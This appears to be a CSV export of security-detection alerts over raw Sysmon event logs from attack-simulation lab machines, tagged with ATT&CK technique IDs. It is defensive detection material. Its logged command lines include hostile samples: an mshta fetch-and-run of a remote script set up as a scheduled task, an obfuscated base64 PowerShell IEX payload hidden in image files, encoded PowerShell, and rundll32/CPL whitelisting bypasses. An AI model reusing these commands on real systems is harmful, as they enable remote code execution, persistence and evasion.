"C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1017 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 
17:26:08.686 + 365ABB72-D7B0-5CE6-0000-001077C56D00 + 3388 + \\vboxsrv\HTools\msxsl.exe + 1.1.0.1 + msxsl + Command Line XSLT + Microsoft + msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat + D:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8 + 365ABB72-D2D4-5CE6-0000-001047EA6400 + 2236 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 380456 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + - + 2020-09-10 17:48:39.678 + 747F3D96-66F7-5F5A-0500-00000000F600 + 388 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\windows\system32\cmd.exe + c:\windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-66F8-5F5A-E703-000000000000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-66F4-5F5A-0300-00000000F600 + 300 + C:\Windows\System32\smss.exe + \SystemRoot\System32\smss.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( 
C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + 
C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16511 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:20:01.964 + 365ABB72-55C1-5CD8-0000-0010970D2F00 + 4092 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-502E-5CD8-0000-00102A330700 + 3192 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + 
+ + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + 
"C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5940 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.852 + 365ABB72-3D6E-5CEB-0000-00102FAAFF00 + 3304 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 
6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 839 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-22 04:02:11.287 + 365ABB72-C9C3-5CE4-0000-00101F422E00 + 2888 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-C32E-5CE4-0000-00205DF00000 + 0xf05d + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-C9C1-5CE4-0000-00100B222E00 + 3156 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1600 CREDAT:275470 /prefetch:2 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( 
C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6182 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.456 + 365ABB72-FE6F-5CEB-0000-0010D33A0C00 + 3344 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4907 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:19.556 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49826 + + false + 
151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4129 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:59.729 + 365ABB72-1A2B-5CE4-0000-00102F502201 + 3772 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10154 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 22:52:27.588 + 365ABB72-D1AB-5CC8-0000-0010DB1E4400 + 1372 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + 
C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-C494-5CC8-0000-0020E4FF0000 + 0xffe4 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-D0E5-5CC8-0000-0010DADF3E00 + 2892 + C:\Windows\System32\cmd.exe + cmd + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10662 + + + + + Microsoft-Windows-Sysmon/Operational + 
MSEDGEWIN10 + + + + + + 2019-08-14 11:53:29.768 + 747F3D96-F639-5D53-0000-0010B0FC2600 + 8180 + C:\Windows\System32\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C + 747F3D96-F639-5D53-0000-001092EE2600 + 6000 + C:\Windows\explorer.exe + C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( 
C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5937 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.782 + 365ABB72-3D6E-5CEB-0000-00106FA6FF00 + 1876 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16389 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.275 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + 
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6180 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.402 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) 
